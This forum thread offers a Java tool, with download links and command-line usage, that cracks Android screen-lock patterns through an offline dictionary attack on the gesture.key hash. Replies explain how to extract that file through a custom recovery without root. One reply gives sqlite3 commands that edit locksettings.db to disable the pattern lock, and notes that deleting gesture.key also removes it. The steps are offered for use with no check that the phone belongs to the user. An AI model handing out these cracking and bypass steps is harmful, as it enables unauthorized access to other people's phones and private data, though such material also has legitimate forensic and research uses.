[Tool] Android Screenlock Gesture Crack

[Psycho_Coder]

AndroidGestureCrack

Cracks Android Screenlock Gesture Pattern using dictionary Attack

Description

A Java tool to crack the Gesture Screenlock pattern of an Android Phone. Android's pattern lock contains a SHA1 hash of the pattern in a gesture.key file in /data/system folder in the internal memory of the android. It has been tested on Android API Level 15 and up, but should work with lower versions as well. As long as you extract the gesture.key file this tool will work well. The key is a SHA1 hash of the sequence of bytes of the pattern. The hash is unsalted and hence very easy to crack. The code uses the dictionary which you can download from the link below:-

Download Dictionary

Usage

You need to get the gesture.key file from android hidden system folder and extract the dictionary file from link above. Use them in the following way:

Code: [Select]

java -jar AndroidGestureCrack.jar --gui
                    or
java -jar AndroidGestureCrack.jar gesture.key AndroidGestureSHA1.txt

Sample Run





Note: There are scopes to improve the GUI (I haven't used any layouts in general but if you make some changes then let me know.)

Project Link: https://github.com/AnimeshShaw/AndroidGestureCrack
Download Latest release: https://github.com/AnimeshShaw/AndroidGestureCrack/releases/download/v2.0-beta/AndroidGestureCrack.jar

You Require Java 8 to compile the code

[Psycho_Coder]

Update: Made little changes and added an executable jar.

[Trevor]

The algorithm behind this for those who are interested.

http://www.cclgroupltd.com/a-rainbow-table-for-android-pattern-locks/

[Psycho_Coder]

Thread Updated and a new version has been released. Now it comes along with a GUI as well.

[0E 800]

Nice work.

Is it possible to get the gesture.key without a rooted phone?
Is it possible to get key if unable to enable ADB on phone?

[Saw]

Won't the phone get locked down due the number of retries?

[0E 800]

Won't the phone get locked down due the number of retries?

Its an offline bruteforce method. You retrieve gesture.key from the device and then run the bruteforcer against it on another machine.

[gray-fox]

Is it possible to get the gesture.key without a rooted phone?
Is it possible to get key if unable to enable ADB on phone?

I try to answer these questions but have to say this may not be the latest or most correct info, but just something I have learned when doing stuff with my own devices.

Answer to both questions is yes in theory,but it still needs quit optimal conditions. If phone has custom recovery or if you can flash one to it(which does not require rooted device), then you can boot to recovery, mount /data partition and copy gesture.key to external sdcard or usb device via otg. Atleast TWRP has file manager and terminal access in it, so it can be done with one of those tools. But phone's bootloader might need to be unlocked(in case of flashing something to it), then it's kind of game over because unlocking bootloader wipes the device completly.

----End of the actual answer---

As additional info. if pattern doesn't need to be cracked and you could freely just tamper with the device then in most android versions/devices you could also just disable pattern lock if you can get access to /data partition. I know this is very common knowledge to most but if phone is running kitkat or earlier android you could just delete gesture.key and pattern lock gets disabled.

With my Nexus5 running Android 5.1 I was able to disable pattern lock with tampering "data/system/locksettings.db"-database.

Code: [Select]

sqlite3 /data/system/locksettings.db
delete from locksettings where name='lockscreen.password_type';
.exit;
Then reboot and pattern lock was disabled. Not sure how widely this works in different devices/lollipop versions and you would need to push copy of sqlite3 to phone if it doesn't have it already.

But really nice tool anyways op +1.